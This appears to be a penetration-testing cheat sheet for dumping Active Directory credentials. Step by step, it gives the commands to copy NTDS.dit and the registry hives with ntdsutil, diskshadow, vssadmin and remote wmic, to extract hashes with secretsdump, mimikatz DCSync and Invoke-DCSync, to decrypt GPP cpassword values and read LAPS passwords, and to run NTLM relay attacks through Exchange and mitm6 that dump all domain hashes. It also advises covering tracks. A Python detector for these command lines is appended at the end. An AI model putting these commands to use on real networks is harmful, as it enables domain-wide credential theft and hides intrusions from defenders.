When Domain Admin access has been achieved you may attempt to extract all of the domain user password hashes from the Domain Controller. They are stored in the 'NTDS.dit' file (`C:\Windows\NTDS\NTDS.dit`). However, this file is in constant use and locked, so one of the methods below is needed to retrieve a copy of it for offline cracking of user hashes.

Manually save Windows (XP/Vista/7) registry hive tables using 'reg.exe':

```
C:\WINDOWS\system32>reg.exe save HKLM\SAM C:\temp\sam_backup.hiv
C:\WINDOWS\system32>reg.exe save HKLM\SECURITY C:\temp\sec_backup.hiv
C:\WINDOWS\system32>reg.exe save HKLM\system C:\temp\sys_backup.hiv
```

## [[NTDSUTIL]]

The 'ntdsutil' utility is packaged with Windows DCs to manage Active Directory.

STEP 1: Execute 'ntdsutil':

```
C:\>ntdsutil
```

STEP 2: At the 'ntdsutil:' prompt execute:

```
activate instance ntds
```

STEP 3: At the next 'ntdsutil:' prompt execute:

```
ifm
```

STEP 4: At the 'ifm:' prompt execute:

```
create full C:\temp\ntdsutil
```

STEP 5: After STEP 4 finishes, execute 'quit' at the 'ifm:' and 'ntdsutil:' prompts to exit the utility:

```
quit
quit
```

STEP 6: Retrieve the files from the newly created folders "Active Directory" (where ntds.dit will be located) and "Registry" (where the SAM and SYSTEM files will be located):

```
C:\temp\ntdsutil\Active Directory
C:\temp\ntdsutil\Registry
```

## DISKSHADOW

'diskshadow.exe' is a tool signed by Microsoft (Windows 2008/2012/2016) exposing the functionality of the traditional VSS (Volume Shadow Copy Service). It has both an interactive and a script mode. Below is a scripted mode for copying ntds.dit:

STEP 1: Add the following into a text file 'diskshadow.txt' on the target:

```
set context persistent nowriters
add volume c: alias stealthAlias
create
expose %stealthAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\ntds.dit
delete shadows volume %stealthAlias%
reset
```

STEP 2: Execute the new script with diskshadow.exe. !IMPORTANT! diskshadow.exe must be executed from C:\Windows\System32\ or else it will fail:

```
C:\Windows\System32>diskshadow.exe /s c:\diskshadow.txt
```

STEP 3: Manually save the SYSTEM hive from the registry:

```
C:\Windows\system32>reg.exe save HKLM\system C:\temp\sys_backup.hiv
```

STEP 4: Retrieve ntds.dit and sys_backup.hiv from C:\temp:

```
C:\temp\ntds.dit
C:\temp\sys_backup.hiv
```

## VSSADMIN

'vssadmin' is the Volume Shadow Copy Service administration tool included with Windows servers for managing volume shadow copy backups.

STEP 1: Create a volume shadow copy:

```
C:\Windows\system32>vssadmin create shadow /for=C:
```

STEP 2: Copy ntds.dit into C:\temp from the new volume shadow copy:

```
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp\ntds.dit
```

STEP 3: Manually save the SYSTEM hive from the registry:

```
C:\Windows\system32>reg.exe save HKLM\system C:\temp\sys_backup.hiv
```

STEP 4: Retrieve ntds.dit and sys_backup.hiv from C:\temp:

```
C:\temp\ntds.dit
C:\temp\sys_backup.hiv
```

STEP 5: Cover your tracks by deleting the newly created shadow volume:

```
C:\Windows\system32>vssadmin delete shadows /shadow={Shadow Copy ID}
```

## WMI & VSSADMIN (Remotely extract NTDS.dit and SYSTEM hive)

Use WMI to execute 'vssadmin' remotely and retrieve ntds.dit and the SYSTEM hive.
STEP 1: Use WMI to execute 'vssadmin' and create a new volume shadow copy:

```
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
```

STEP 2: Extract 'ntds.dit' from the new volume shadow copy:

```
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
```

STEP 3: Save off the SYSTEM hive from the shadow copy:

```
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\sys_backup.hiv 2>&1"
```

STEP 4: Retrieve ntds.dit and sys_backup.hiv from C:\temp:

```
C:\temp\ntds.dit
C:\temp\sys_backup.hiv
```

## EXTRACT DOMAIN HASHES FROM NTDS.DIT

Extract the user account hashes for offline cracking.

##### [[IMPACKET SECRETSDUMP]]

https://github.com/SecureAuthCorp/impacket

LOCAL: Use 'secretsdump.py' on your local attack workstation to extract the user account hashes from ntds.dit using the SYSTEM hive sys_backup.hiv:

```
secretsdump.py -ntds ntds.dit -system sys_backup.hiv LOCAL
```

REMOTE: 'secretsdump.py' can optionally be used to remotely dump the user account hashes from a target Domain Controller using a Domain Admin hash (LM:NT):

```
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:82f9aab58dd8jw614e268c4c6a657djw -just-dc DOMAIN/DC_hostname\[email protected]
```

##### [[MIMIKATZ]]

Use mimikatz to pull account information (LM hash, NTLM hash, history, etc.) for a target user account.

https://adsecurity.org/?p=2053

```
mimikatz # lsadump::dcsync /domain:<DOMAIN.org.com> /user:<username>
```

##### [[INVOKE-DCSYNC]]

Invoke-DCSync is a PowerShell script which uses PowerView to interact with the Mimikatz DCSync method and extract hashes through a DLL wrapper of PowerKatz.
https://gist.github.com/monoxgas/9d238accd969550136db

```
PS> Invoke-DCSync -PWDumpFormat
```

## DUMP SYSVOL & GROUP POLICY PREFS

All Domain Controllers have a shared SYSVOL folder which contains files, scripts, and folders which must be synchronized across domain controllers. The contents can contain plaintext and encrypted credentials. Domain Group Policies are stored under `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.

STEP 1: Open the "run" window and find the logonserver folder:

```
run> %LOGONSERVER%
```

STEP 2: In SYSVOL, search XML, VBS or Batch files for the strings:

```
'cpassword'
'net user'
'pass'
'sPwd'
```

Inside XML files the 'cpassword' value is encrypted using the following 32-byte AES encryption key published by Microsoft:

```
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 d4 af 10 22
```

You can use Get-GPPPassword to search a Domain Controller for group policy preferences in groups.xml, scheduledtasks.xml, services.xml and datasources.xml and automatically decrypt 'cpassword' into plaintext passwords.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1

Automatically search and decrypt group policy related XML files:

```
PS C:\> Get-GPPPassword
```

Manually decrypt a 'cpassword' value found in XML files:

```
PS C:\> Get-GPPPassword '<cpassword_value>'
```

Remotely search, retrieve, and decrypt group policy related XML files:

```
PS C:\> Get-GPPPassword -Server EXAMPLE.COM
```

## LAPS (Local Administrator Password Solution)

LAPS allows administrators to generate random local administrative passwords for computers joined to the domain and to manage and store them. Admins or users with appropriate access can read/write the LAPS-created and stored credentials in plaintext.
REFERENCE: https://room362.com/post/2017/dump-laps-passwords-with-ldapsearch/

STEP 1: Query your access machine to see if LAPS is enabled:

```
PS> Get-ChildItem 'C:\Program Files\LAPS\CSE\AdmPwd.dll'
```

STEP 2: Git clone (1) Get-LAPSPasswords or (2) PowerSploit, or use (3) ldapsearch or (4) meterpreter:

https://github.com/kfosaaen/Get-LAPSPasswords
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

STEP 3: Using a user with permissions to read LAPS, execute 1 of the 4 possible techniques:

```
(1) PS> Get-LAPSPasswords -DomainController <DC_IPAddr> -Credential <DOMAIN\username> | Format-Table -AutoSize
(2) PS> Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')}
(3) # ldapsearch -x -h <DC_IPAddr> -D <username> -w <password> -b "dc=<DOMAIN>,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
(4) meterpreter> run post/windows/gather/credentials/enum_laps
```

## PRIVEXCHANGE + NTLMRELAYX + EXCHANGE = ALL DOMAIN HASHES

##### EXCHANGE MAILBOX

SCENARIO: You've obtained a user account and password for a user on your target network with an Exchange mailbox. Also, you have access to an Exchange deployment whose "Exchange Windows Permissions" group has "WriteDacl" on the Domain object in Active Directory, which allows a DCSync operation. This allows you to sync all the user password hashes in Active Directory.

REFERENCE: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domainadmin/

STEP 1: You've obtained a valid username and password for a mailbox on Exchange.

STEP 2: Install required tools:
Impacket ntlmrelayx & secretsdump - https://github.com/SecureAuthCorp/impacket
PrivExchange - https://github.com/dirkjanm/privexchange/

STEP 3: Open two new terminal windows to prepare for the attack.
STEP 4: Start ntlmrelayx in relay mode pointing at the Domain Controller with any user that has a mailbox on Exchange:

```
TERMINAL #1
ntlmrelayx.py -t ldap://dc.lab.local --escalate-user <username>
```

STEP 5: Run 'privexchange.py' pointing at the Exchange server, with '-ah' being your attacker IP address where ntlmrelayx is listening:

```
TERMINAL #2
python privexchange.py -ah <ntlmrelayx_IPAddr> exchange.lab.local -u <username> -d testsegment.local
```

!!You should see "INFO: API call was successful" if this works!!

STEP 6: Wait nearly a minute for the attack to complete in TERMINAL #1 where ntlmrelayx is listening.

STEP 7: With your newly created privileges, using the same mailbox credentials used previously, you can now use 'secretsdump.py' to perform a DCSync operation against the Domain Controller and dump all the domain user hashes:

```
secretsdump.py lab/<username>@dc.lab.local -just-dc
```

## HTTPATTACK + NTLMRELAYX + EXCHANGE = ALL DOMAIN HASHES

SCENARIO: You DO NOT HAVE A PASSWORD for a user on your target network with an Exchange mailbox, but you have network access. Also, you have access to an Exchange deployment whose "Exchange Windows Permissions" group has "WriteDacl" on the Domain object in Active Directory, which allows a DCSync operation. This allows you to sync all the user password hashes in Active Directory.

REFERENCE: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domainadmin/

STEP 1: Install required tools:
Impacket ntlmrelayx & secretsdump - https://github.com/SecureAuthCorp/impacket
[[PrivExchange]] - https://github.com/dirkjanm/privexchange/
[[mitm6]] - https://github.com/fox-it/mitm6/

STEP 2: Modify the attacker URL inside 'httpattack.py' to point to the IP address where ntlmrelayx will be running and listening.

STEP 3: Copy 'httpattack.py' into the following folder under Impacket: /impacket/impacket/examples/ntlmrelayx/attacks/

STEP 4: Go into the impacket directory and upgrade to the modified version:

```
cd impacket/
pip install . --upgrade
```

STEP 5: Open two new terminal windows to prepare for the attack.

STEP 6: Start ntlmrelayx in relay mode pointing at the Exchange server, with the '-wh' option pointing at any nonexistent host on the network:

```
TERMINAL #1
ntlmrelayx.py -6 -wh blah.lab.local -t https://exchange.lab.local/EWS/Exchange.asmx -l /tmp/ -socks -debug
```

STEP 7: Use LLMNR/NBNS/mitm6 spoofing to relay the authentication of a user on the network.

https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
https://github.com/fox-it/mitm6/

```
TERMINAL #2
sudo mitm6 -d lab.local
```

STEP 8: If successful, you will see 'API call was successful' in the 'ntlmrelayx' TERMINAL #1.

STEP 9: With your newly created privileges, using the captured/relayed credentials from ntlmrelayx, you can now use 'secretsdump.py' to perform a DCSync operation against the Domain Controller and dump all the domain user hashes:

```
secretsdump.py lab/<username>@dc.lab.local -just-dc
```
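A defender-side companion to the local and remote NTDS.dit extraction methods on this page, added here as an example and not part of the original page or any of the tools it names: a small Python detector that runs over constructed process-creation records (host, user, command line; loosely modelled on Windows Security event 4688 / Sysmon event 1 command-line fields) and flags the ntdsutil ifm, vssadmin create shadow, diskshadow /s, shadow-copy ntds.dit copy, reg save of the SAM/SECURITY/SYSTEM hives and remote wmic process call create patterns documented above, while leaving benign look-alikes such as vssadmin list shadows alone. Host names, user names and the sample records are constructed.

```python
import re

# Constructed sample process-creation records as (host, user, command line);
# the shape is loosely modelled on Windows Security event 4688 / Sysmon event 1
# command-line telemetry and is not real data.
SAMPLE_EVENTS = [
    ("DC01", "LAB\\admin", r'ntdsutil "activate instance ntds" ifm "create full C:\temp\ntdsutil" quit quit'),
    ("DC01", "LAB\\admin", r"vssadmin create shadow /for=C:"),
    ("DC01", "LAB\\admin", r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp\ntds.dit"),
    ("DC01", "LAB\\admin", r"reg.exe save HKLM\SAM C:\temp\sam_backup.hiv"),
    ("DC01", "LAB\\admin", r"diskshadow.exe /s c:\diskshadow.txt"),
    ("WS07", "LAB\\jdoe", r'wmic /node:DC01 /user:LAB\admin process call create "cmd /c vssadmin create shadow /for=C: 2>&1"'),
    # Benign look-alikes: listing shadows and a registry query must not alert.
    ("DC01", "NT AUTHORITY\\SYSTEM", r"vssadmin list shadows"),
    ("WS07", "LAB\\jdoe", r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows"),
]

# Detection rules as (name, regex over the full command line). Each rule maps to
# one technique on this page; matching is case-insensitive like Windows tooling.
RULES = [
    ("ntdsutil_ifm", re.compile(r"ntdsutil.*\bifm\b", re.I)),
    ("vss_shadow_create", re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)),
    ("diskshadow_script", re.compile(r"diskshadow(\.exe)?\s+/s\b", re.I)),
    ("shadowcopy_ntds_copy", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.I)),
    ("reg_save_hive", re.compile(r"reg(\.exe)?\s+save\s+HKLM\\(SAM|SECURITY|SYSTEM)\b", re.I)),
    ("wmic_remote_exec", re.compile(r"wmic.*/node:.*process\s+call\s+create", re.I)),
]


def classify(cmdline):
    """Return the names of every rule the command line triggers (empty if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def detect(events):
    """Return (rule_names, host, user, cmdline) for every record that triggers a rule."""
    hits = []
    for host, user, cmdline in events:
        names = classify(cmdline)
        if names:
            hits.append((names, host, user, cmdline))
    return hits


if __name__ == "__main__":
    for names, host, user, cmdline in detect(SAMPLE_EVENTS):
        print(f"{host} {user}: {', '.join(names)} <- {cmdline}")
```

A remote wmic invocation that wraps vssadmin trips both the wmic and the shadow-copy rule, which is the combination worth alerting on first; a reg save or vssadmin create shadow on its own is also what backup jobs do, so the host and account fields are what separate a scheduled backup on a DC from an interactive session.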